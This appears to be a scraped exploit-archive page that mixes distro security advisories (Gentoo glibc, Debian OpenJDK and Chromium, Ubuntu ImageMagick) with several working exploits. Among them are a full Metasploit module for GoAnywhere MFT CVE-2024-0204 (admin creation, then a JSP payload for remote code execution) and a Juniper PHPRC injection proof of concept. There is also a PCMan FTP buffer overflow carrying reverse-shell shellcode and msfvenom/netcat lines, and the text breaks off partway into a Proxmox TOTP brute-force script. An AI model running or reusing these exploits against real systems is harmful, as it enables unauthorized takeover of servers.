This Metasploit module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to          create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere          MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'James Horseman', # Original auth bypass PoC/Analysis          'Zach Hanley' # Original auth bypass PoC/Analysis        ],        'References' => [          ['CVE', '2024-0204'],          ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory          ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']        ],        'DisclosureDate' => '2024-01-22',        'Platform' => %w[linux win],        'Arch' => [ARCH_JAVA],        'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.        'Targets' => [          [            # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp            'Automatic', {}          ],          [            'Linux',            {              'Platform' => 'linux',              'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'            }          ],          [            'Windows',            {              'Platform' => 'win',              'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'            },          ],        ],        'DefaultOptions' => {          'RPORT' => 8001,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # A new admin account is created, which the exploit can't destroy.            CONFIG_CHANGES,            # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),      ]    )  end  def check    # We can query an undocumented unauthenticated REST API endpoint and pull the version number.    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200    json_data = res.get_json_document    product = json_data.dig('data', 'product')    version = json_data.dig('data', 'version')    return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?    # As per the Fortra advisory, the following version are affected:    # * Fortra GoAnywhere MFT 6.x from 6.0.1    # * Fortra GoAnywhere MFT 7.x before 7.4.1    # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.    if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))      return CheckCode::Appears("#{product} #{version}")    end    Exploit::CheckCode::Safe("#{product} #{version}")  end  def exploit    # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So    # we generate the username/password pair we want to use.    # Note: We cannot delete the administrator account that we create.    admin_username = Rex::Text.rand_text_alpha_lower(8)    admin_password = Rex::Text.rand_text_alphanumeric(16)    # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to    # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double    # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick    # a random one that we know works.    path_segments = %w[styles fonts auth help]    path_segment = path_segments.sample    # This is CVE-2024-0204...    initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),        'j_id_u:creteAdminGrid:username' => admin_username,        'j_id_u:creteAdminGrid:password' => admin_password,        'j_id_u:creteAdminGrid:password_hinput' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,        'j_id_u:creteAdminGrid:submitButton' => '',        'createAdminForm_SUBMIT' => 1      }    )    # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method    # loginNewAdminUser and update our current session, so we dont need to manually login.    unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')      fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")    end    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")    store_credentials(admin_username, admin_password)    # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.    if target.name == 'Automatic'      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),        'keep_cookies' => true      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')      end      # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using      # the Java system property "os.name".      os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})      unless os_match        fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')      end      # To perform the JSP payload upload, we need to know the product installation path.      install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})      unless install_match        fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')      end      # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.      found_target = targets.find do |t|        os_match[1].downcase.include? t.name.downcase      end      unless found_target        fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")      end      # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.      detected_target = found_target.dup      detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]      print_status("Automatic targeting, detected OS: #{detected_target.name}")      print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")    else      detected_target = target    end    # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then    # change to the directory we want to upload to, then upload the file.    path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'    # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp    adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']    adminroot_path += path_separator unless adminroot_path.end_with? path_separator    adminroot_path += 'adminroot'    adminroot_path += path_separator    viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'j_id_4u:j_id_4v:newPath_focus' => '',        'j_id_4u:j_id_4v:newPath_input' => '/',        'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,        'j_id_4u:j_id_4v:NewPathButton' => '',        'j_id_4u_SUBMIT' => 1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')    end    # We require a regID value form the page to upload a file, so we pull that out here.    vs_input = res.get_html_document.at('input[name="reqId"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')    end    request_id = vs_input['value']    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'javax.faces.partial.ajax' => 'true',        'javax.faces.source' => 'uploadID',        'javax.faces.partial.execute' => 'uploadID',        'javax.faces.partial.render' => '@none',        'uploadID' => 'uploadID',        'uploadID_sessionCheck' => 'true',        'reqId' => request_id,        'whenFileExists_focus' => '',        'whenFileExists_input' => 'rename',        'uploaderType' => 'filemanager',        'j_id_4i_SUBMIT' =>  1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')    end    jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'    message = Rex::MIME::Message.new    message.add_part(request_id, nil, nil, 'form-data; name="reqId"')    message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')    message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')    message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')    message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')    message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')    message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')    message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')    message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")    # We can now upload our payload...    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'ctype' => 'multipart/form-data; boundary=' + message.bound,      'data' => message.to_s    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')    end    # Register our payload so it is deleted when the session is created.    jsp_filepath = adminroot_path + jsp_filename    print_status("Dropped payload: #{jsp_filepath}")    # We are using the FileDropper mixin to automatically delete this file after a session has been created.    register_file_for_cleanup(jsp_filepath)    # A copy of the files this user uploads is left here:    # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp    # We register these to be deleted, but they appear to be locked, preventing deleting.    userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']    userdoc_path += path_separator unless userdoc_path.end_with? path_separator    userdoc_path += 'userdata'    userdoc_path += path_separator    userdoc_path += 'documents'    userdoc_path += path_separator    userdoc_path += admin_username    userdoc_path += path_separator    register_file_for_cleanup(userdoc_path + jsp_filename)    register_dir_for_cleanup(userdoc_path)    # Finally, trigger our payload via a GET request...    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename)    )    # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web    # interface or REST API.  end  # Helper method to pull out a viewstate identifier from a requests HTML response.  def get_viewstate(endpoint)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, endpoint),      'keep_cookies' => true    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")    end    vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")    end    vs_input['value']  end  def store_credentials(username, password)    service_data = {      address: datastore['RHOST'],      port: datastore['RPORT'],      service_name: 'GoAnywhere MFT Admin Interface',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: username,      private_data: password,      private_type: :password    }.merge(service_data)    credential_core = create_credential(credential_data)    login_data = {      core: credential_core,      last_attempted_at: DateTime.now,      status: Metasploit::Model::Login::Status::SUCCESSFUL    }.merge(service_data)    create_credential_login(login_data)  endend

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Gentoo Linux Security Advisory 202402-1 - Multiple vulnerabilities in glibc could result in Local Privilege Escalation. Versions greater than or equal to 2.38-r10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: glibc: Multiple Vulnerabilities  
     Date: February 02, 2024  
     Bugs: #918412, #923352  
       ID: 202402-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities in glibc could result in Local Privilege  
Escalation.

Background  
==========

glibc is a package that contains the GNU C library.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
sys-libs/glibc  < 2.38-r10    >= 2.38-r10

Description  
===========

Multiple vulnerabilities have been discovered in glibc. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All glibc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-libs/glibc-2.38-r10"

References  
==========

[ 1 ] CVE-2023-5156  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5156  
[ 2 ] CVE-2023-6246  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6246  
[ 3 ] CVE-2023-6779  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6779  
[ 4 ] CVE-2023-6780  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6780  
[ 5 ] GLIBC-SA-2024-0001  
[ 6 ] GLIBC-SA-2024-0002  
[ 7 ] GLIBC-SA-2024-0003

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-01

Debian Linux Security Advisory 5613-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in side channel attacks, leaking sensitive data to log files, denial of service or bypass of sandbox restrictions.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5613-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2024-20918 CVE-2024-20919 CVE-2024-20921 CVE-2024-20926                  CVE-2024-20932 CVE-2024-20945 CVE-2024-20952Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in side channel attacks, leaking sensitive data to logfiles, denial of service or bypass of sandbox restrictions.For the oldstable distribution (bullseye), these problems have been fixedin version 17.0.10+7-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.10+7-1~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW8HJwACgkQEMKTtsN8Tjbt9A//Xgt7dwtzkBgkxjJ9Tq6pqQGqYzQQjID6xmyta+/oZ9FJzPojV+1I7z7YeOOYrXHmCU9EM30Gbwtt4aEBbz1lvAk1mYC5Ob5TE+oYS/r76REJS89IqkNpmlpWFMzQICgPDHPE1Vm3HyitF6Xy9CLOFZBeH0wELhzuHAIOd4rb+XqQsW8JW4V12ZoLAVHoP5U2PGBPWVbyEY06LTgyEe06L+XX1zSiPnRnhdeTs7YD69SxMUP9AF7QvfIzOvzLw0u0M4g7KNzZ+43OJOdlbq76KzfcqfkoxWA3902vYewfyncx5HVCNpCQdrESIt9Xjqojmda7dh0V9EIGP3HHFufjWnJTOegPqeJ2RV03LkpOygg1W+XEHn32fcA1EtqDYUW67jsu81dYZs2wc2YqALJfjYjeUKBdcRD91MUqn7uBpCfPd9Yo1rrO2dqyeBgQeI7itzdM+bEtCkuVcnyCWr4rXK4kt2xpIdkcwUZxCosQ7FX/TchvyPvDk2LQSMg2azCSAhcrv7aB/jzxlvSF/iRzQipdLmRgc4H+8TY0lG43m7xzHlyu3TXerDNIBQGktkWo6182rScrO+t0brfcCpTxUQwGyBrHh7SQURdvffZPCJ36/7YmjGSWZi4qafr6OfTCGDlt/BcE5fhROsA7OKNgwumUz9hqSK3mCFBDmhDQDTw==Suvn-----END PGP SIGNATURE-----

Debian Security Advisory 5613-1

Ubuntu Security Notice 6621-1 - It was discovered that ImageMagick incorrectly handled certain values when processing BMP files. An attacker could exploit this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6621-1  
February 01, 2024

imagemagick vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

ImageMagick could be made to crash if it opened a specially crafted  
file.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

It was discovered that ImageMagick incorrectly handled certain values when  
processing BMP files. An attacker could exploit this to cause a denial of  
service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3+esm3  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3+esm3  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3+esm3  
  libmagickcore-6.q16-6-extra     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.3+esm3

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
  imagemagick                     8:6.9.10.23+dfsg-2.1ubuntu11.9+esm2  
  imagemagick-6.q16               8:6.9.10.23+dfsg-2.1ubuntu11.9+esm2  
  libmagickcore-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.9+esm2  
  libmagickcore-6.q16-6-extra     8:6.9.10.23+dfsg-2.1ubuntu11.9+esm2

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  imagemagick                     8:6.9.7.4+dfsg-16ubuntu6.15+esm3  
  libmagickcore-6.q16-3           8:6.9.7.4+dfsg-16ubuntu6.15+esm3  
  libmagickcore-6.q16-3-extra     8:6.9.7.4+dfsg-16ubuntu6.15+esm3

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  imagemagick                     8:6.8.9.9-7ubuntu5.16+esm10  
  imagemagick-6.q16               8:6.8.9.9-7ubuntu5.16+esm10  
  libmagickcore-6.q16-2           8:6.8.9.9-7ubuntu5.16+esm10  
  libmagickcore-6.q16-2-extra     8:6.8.9.9-7ubuntu5.16+esm10

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  imagemagick                     8:6.7.7.10-6ubuntu3.13+esm7  
  libmagickcore5                  8:6.7.7.10-6ubuntu3.13+esm7  
  libmagickcore5-extra            8:6.7.7.10-6ubuntu3.13+esm7

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6621-1  
  CVE-2023-5341

Ubuntu Security Notice USN-6621-1

Debian Linux Security Advisory 5612-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5612-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1059 CVE-2024-1060 CVE-2024-1077Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.139-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmW742EACgkQZF0CR8NudjdCCA//R3r8wJi68kZQZOOUeekz1PrrGI/uFuD3Ial5GxJytfKDyuXI8d55GyXbqCZzMQYeL0l9JO5wEscb2wixvnaD+4zG1cb6hwMFo7Rae1KMMgo9JHKgOFVIPnI9upvtDI8GdQoJyhoVIRab4FkD09lNUYIz2UCUJEwORa7+JVaCoSYiG3Mkj2p2SDwxpn2BiN5rI/G/GrfF/nJuJ+ebiZsh3jQyfsreomKo6Bq3ajsYKs5G4osOxK164Mjp8gKYx82dzxiK2e/58gvEUdY3h3oG8twQMJ5VrYgIT19Ih4XNpn50x4Bn+OlzTR7vPG6RuOgTY/XjHr4Pfc+NYd7hEfyH37KODFUCC5482jCY9aLSHmP/poGmo8SfSBO+H7NmZC8g8co2hOf30Bczfndb4TMpz8PRz/zojzBWmL2mIYU/O0aavcS+xO8gy753xuoESFbjj9Z0j5YRphyCyh/aB3gKxiY+LMh97EEjQWvI8XJucYJ+6IFdNWJOHTNoZEOe7tXnwKQ4EP4BtG7DDfaH7+VaKJ64ZkAqeXK8niIMPGfb7km4o7wVk58XI88+Yj9xtW+8opyBjahmhCwXs+01S2e+BfOb3k22HXBwNZ9Idq0KTtoRm4Jazf/JH3MTQLS8ri5ZFPeqIdkJer2tN0lSv2KeVASYd1j3oCgG2LJA6eHiNhE==B96X-----END PGP SIGNATURE-----

Debian Security Advisory 5612-1

This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. It executes the phpinfo() function on the login page of the target device, allowing to inspect the PHP configuration. This script also has the option to save the phpinfo() output to a file for further analysis.

    # ***************************************************************************************************# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)# Description:## This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.# It executes the phpinfo() function on the login page of the target device, # allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() # output to a file for further analysis.## Shodan Dork: http.favicon.hash:2141724739# Date: 2023/10/01# Exploit Author: whiteOwl (whiteowl.pub@gmail.com)# Vendor Homepage: https://whiteowl-pub.github.io# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,#          21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.#          4R2-S1/R3,23.2R1-S1/R2# Tested on: JUNOS SM804122pri 15.1X49-D170.4# CVE : cve-2023-36845# ***************************************************************************************************import argparseimport requestsbanner = """************************************************************** CVE-2023-36845 Vulnerability Detector & Proof of concept  ** This script checks for the CVE-2023-36845 vulnerability   ** and run phpinfo() on vulnerable devices.                  ** If you suspect a vulnerable system, please take action    ** immediately to secure it.                                 **                                                           ** Author: whiteowl                                          **************************************************************"""def send_request(url, output_file=None, verbose=False):    target_url = f"{url}/?PHPRC=/dev/fd/0"    data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'    headers = {        'User-Agent': 'Mozilla/5.0',    }    try:        response = requests.post(target_url, headers=headers, data=data, stream=True)        if response.status_code == 200:            print("The Target Device is Vulnerable to: CVE-2023-36845")        else:            print("Not Vulnerable: Status Code", response.status_code)                    if output_file:            with open(output_file, 'w', encoding='utf-8') as file:                file.write(response.text)        if verbose:            print(f"HTTP Status Code: {response.status_code}")            print("Response Headers:")            for header, value in response.headers.items():                print(f"{header}: {value}")            print("Response Content:")            print(response.text)    except requests.exceptions.RequestException as e:        print(f"An error occurred: {e}")def main():    print(banner)     parser = argparse.ArgumentParser(description="Custom curl-like script")    parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")    parser.add_argument("-o", "--output", help="Output file to save the HTML content")    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")    args = parser.parse_args()    send_request(args.url, args.output, args.verbose)if __name__ == "__main__":    main()

Juniper SRX Firewall / EX Switch Remote Code Execution

PCMan FTP Server version 2.0 pwn remote buffer overflow exploit.

    # Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow# Date: 09/25/2023# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)# Vendor Homepage: http://pcman.openfoundry.org/# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z# Version: 2.0# Tested on: Windows XP SP3#!/usr/bin/pythonimport socket#buffer = 'A' * 2500#offset = 2007#badchars=\x00\x0a\x0d#return_address=0x7e429353 (USER32.dll)#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"#nc -nvlp 4444overflow = ("\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9""\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d""\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f""\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53""\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55""\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1""\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52""\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6""\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37""\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf""\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3""\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4""\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75""\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7""\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e""\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17""\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"                                                                                           "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"                                                                                                             "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"                                                                                                             "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"                                                                                                             "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"                                                                                                             "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"                                                                                                             "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"                                                                                                             "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd""\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94""\xd7")shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow# Change IP/Port as required  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:        print "\nSending evil buffer..."        s.connect(('192.168.146.135',21))        data = s.recv(1024)        s.send('USER anonymous' +'\r\n')        data = s.recv(1024)        s.send('PASS anonymous\r\n')        s.send('pwd ' + shellcode + '\r\n')        s.close()        print "\nExploit completed successfully!."except:        print "Could not connect to FTP!"

PCMan FTP Server 2.0 Buffer Overflow

Proxmox VE versions 5.4 through 7.4-1 suffer from a TOTP brute forcing vulnerability.

    # Exploit Title: Proxmox VE TOTP Brute Force# Date: 09/23/2023# Exploit Author: Cory Cline, Gabe Rust# Vendor Homepage: https://www.proxmox.com/en/# Software Link: http://download.proxmox.com/iso/# Version: 5.4 - 7.4-1# Tested on: Debian# CVE : CVE-2023-43320import timeimport requestsimport urllib.parseimport jsonimport osimport urllib3urllib3.disable_warnings()threads=25#################### REPLACE THESE VALUES #########################password="KNOWN PASSWORD HERE"username="KNOWN USERNAME HERE"target_url="https://HOST:PORT"##################################################################ticket=""ticket_username=""CSRFPreventionToken=""ticket_data={}auto_refresh_time = 20 # in minutes - 30 minutes before expirationlast_refresh_time = 0tokens = [];for num in range(0,1000000):    tokens.append(str(num).zfill(6))def refresh_ticket(target_url, username, password):    global CSRFPreventionToken    global ticket_username    global ticket_data    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"    refresh_ticket_cookies = {}    refresh_ticket_headers = {}    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": 